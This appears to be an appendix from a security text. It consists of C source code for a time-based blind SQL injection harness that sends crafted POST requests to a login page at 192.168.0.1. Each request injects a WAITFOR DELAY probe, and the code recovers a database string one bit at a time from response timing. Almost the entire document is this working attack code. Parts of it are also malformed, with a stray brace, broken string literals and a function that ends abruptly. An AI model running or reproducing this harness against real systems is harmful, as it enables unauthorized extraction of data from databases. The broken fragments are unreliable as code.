APPENDIX A

Example C Code for a Time-Delay SQL Injection Harness

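/*
 * Entry point: harness <query> <bit_start> <bit_end>.
 *
 * Walks the bit indices [bit_start, bit_end), launching one probe thread per
 * bit (thread_proc), and stops early once the recovered string appears to have
 * ended. Results accumulate in the global buffer `out`; `query`, `bit_start`
 * and `bit_end` are globals read by the probe threads.
 *
 * Returns 0 on completion or when the string terminator is detected, 1 on a
 * thread timeout or a bad bit range, and whatever syntax() returns for a
 * usage error.
 */
int main( int argc, char *argv[] )
{
      /* One probe thread per round; h_thread has room for up to 32. */
      enum { THREADS = 1, MAX_THREADS = 32 };
      /* out is cleared as 1024 * 64 bytes below, so that is the most bits it
       * can receive (assumes out really is that large - confirm at its definition). */
      const long max_bits = 1024L * 64 * 8;
      HANDLE h_thread[MAX_THREADS];
      long start, end_bit;
      char *end;
      int i, t;

      memset( out, 0, 1024 * 64 );

      if ( argc != 4 )
            return syntax();

      query = argv[1];

      /* strtol rather than atoi: reject non-numeric input instead of silently
       * treating it as bit 0. Overflow clamps to LONG_MIN/LONG_MAX, which the
       * range check below rejects. */
      start = strtol( argv[2], &end, 10 );
      if ( end == argv[2] || *end != '\0' )
            return syntax();
      end_bit = strtol( argv[3], &end, 10 );
      if ( end == argv[3] || *end != '\0' )
            return syntax();

      /* Bound the range so no thread can index past the end of out. */
      if ( start < 0 || end_bit < start || end_bit > max_bits )
      {
            printf( "Error - bit range must satisfy 0 <= start <= end <= %ld\n", max_bits );
            return 1;
      }
      bit_start = (int)start;
      bit_end = (int)end_bit;

      for( i = bit_start; i < bit_end; i += THREADS )
      {
            /* The bit index travels to the thread as the void* argument. */
            for( t = 0; t < THREADS; t++ )
                  h_thread[t] = (HANDLE)_beginthread( thread_proc, 0, (void *)(i + t) );

            /* Each thread pauses 2 s and then issues a request the injected
             * WAITFOR may hold for 4 s; 30 s is the overall budget per round. */
            if ( WaitForMultipleObjects( THREADS, h_thread, TRUE, 30000 ) == WAIT_TIMEOUT )
            {
                  printf( "Error - timeout waiting for response\n" );
                  return 1;
            }

            /* Stop when the previous byte is a full zero and the byte in
             * progress has no set bit so far: the result string has ended.
             * Only look back when there is a previous byte; the old check
             * read out[-1] for bits 0..7. */
            if ( ( i / 8 ) > 0 && out[ i / 8 ] == 0 && out[ ( i / 8 ) - 1 ] == 0 )
            {
                  printf( "Done!\n" );
                  return 0;
            }
      }

      return 0;
}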


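/*
 * Build the HTTP POST that probes one bit of the injected query's result.
 *
 * query     - attacker-supplied SQL fragment; it is expected to leave the
 *             value being extracted in @s (the probe below reads @s).
 * bit       - zero-based bit index into the result: byte bit/8, bit bit%8.
 * request   - output buffer; the request is appended after any text already
 *             there (the caller in this file passes an empty buffer).
 * buff_len  - capacity of request in bytes.
 *
 * Returns 1 when the complete request fits in `request`, 0 when an argument
 * is invalid or the payload or request would be truncated (the original
 * always returned 1). Host and path are hard-coded to match the WebGet()
 * call in do_time_web_request.
 */
int create_get_bit_request( char *query, int bit, char *request, int buff_len )
{
      /* Form fields the encoded query string is appended to. */
      static const char body_prefix[] = "submit=Submit&Password=&Username=";
      char query_string[ 1024 * 64 ];
      char params[ 1024 * 64 ];
      size_t used, offset, i;
      char *terminator;
      int n;

      if ( query == NULL || request == NULL || buff_len <= 0 || bit < 0 )
            return 0;

      /* Close the application's quoted literal, run the caller's query, then
       * test one bit of one character of @s: a 4-second WAITFOR means 1. */
      n = snprintf( query_string, sizeof query_string,
                    "'; %s if (ascii(substring(@s, %d, 1)) & ( power(2, %d))) > 0 waitfor delay '0:0:4'--",
                    query, (bit / 8) + 1, bit % 8 );
      if ( n < 0 || (size_t)n >= sizeof query_string )
            return 0;

      /* Percent-encode every byte of the payload. Always emit two hex digits
       * from an unsigned char: the old "%x" on a plain char produced a single
       * digit for bytes below 0x10 and a sign-extended %ffffffxx for bytes
       * above 0x7f, both of which the server decodes differently from what
       * was intended. */
      used = strlen( body_prefix );
      memcpy( params, body_prefix, used + 1 );
      for ( i = 0; query_string[i] != '\0'; i++ )
      {
            if ( used + 3 >= sizeof params )
                  return 0;       /* encoded payload does not fit */
            snprintf( params + used, sizeof params - used, "%%%02x",
                      (unsigned char)query_string[i] );
            used += 3;
      }

      /* Append after the caller's existing content, like the old strcat chain. */
      terminator = memchr( request, '\0', (size_t)buff_len );
      offset = terminator ? (size_t)(terminator - request) : 0;

      /* HTTP/1.1 header lines are CRLF-terminated; Content-Length is the
       * length of the encoded body that follows the blank line. */
      n = snprintf( request + offset, (size_t)buff_len - offset,
                    "POST /login.asp HTTP/1.1\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n"
                    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n"
                    "Host: 192.168.0.1\r\n"
                    "Connection: Close\r\n"
                    "Cache-Control: no-cache\r\n"
                    "Content-Length: %zu\r\n"
                    "\r\n"
                    "%s",
                    used, params );
      if ( n < 0 || (size_t)n >= (size_t)buff_len - offset )
      {
            request[offset] = '\0';     /* truncated: never send a partial request */
            return 0;
      }

      return 1;
}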


}

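/*
 * Probe thread body: retrieve one bit of the result and merge it into the
 * global `out` buffer (done inside do_time_web_request).
 *
 * bit - bit index to probe. main() starts this via _beginthread and passes
 *       the index as the void* argument; NOTE(review): _beginthread expects a
 *       void (*)(void *) routine, so the int parameter here relies on the
 *       target CRT's calling convention - confirm on the build toolchain.
 *
 * Reads the globals query, out and len. Returns 0 after the probe, 1 if the
 * request could not be built (in which case nothing is sent).
 */
int thread_proc( int bit )
{
      char request[ 1024 * 64 ] = "";

      if ( !create_get_bit_request( query, bit, request, (int)sizeof request ) )
      {
            printf( "Error - could not build request for bit %d\n", bit );
            return 1;
      }

      do_time_web_request( request, bit, out, len );

      /* Progress dump of the string recovered so far. */
      printf( "String = %s\n", out );

      return 0;
}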

int do_time_web_request( char *request, int bit, char
*out_string, int len )
{
      char output[ 1024 * 64 ];
      int out_len = 1024 * 64;
      DWORD start;
      int byte = bit / 8;
      int bbit = bit % 8;

      start = GetTickCount();

      memset( output, 0, (1024 * 64) );

      Sleep(2000);

      WebGet( "192.168.0.1", 80, 0, request, output, &out_len );

      if ( ( GetTickCount() - start ) > 4000 )
      {
            printf( "bit %d	=1
", bit );
// set the bit
            if ( byte <= len )
                  out_string[byte] = out_string[byte] | (1 << bbit);
            else
                  printf("error - output string too short" );

            return 1;
      }
      else
      {
            printf( "bit %d	=0
", bit );

            return 0;
      }

      return 1;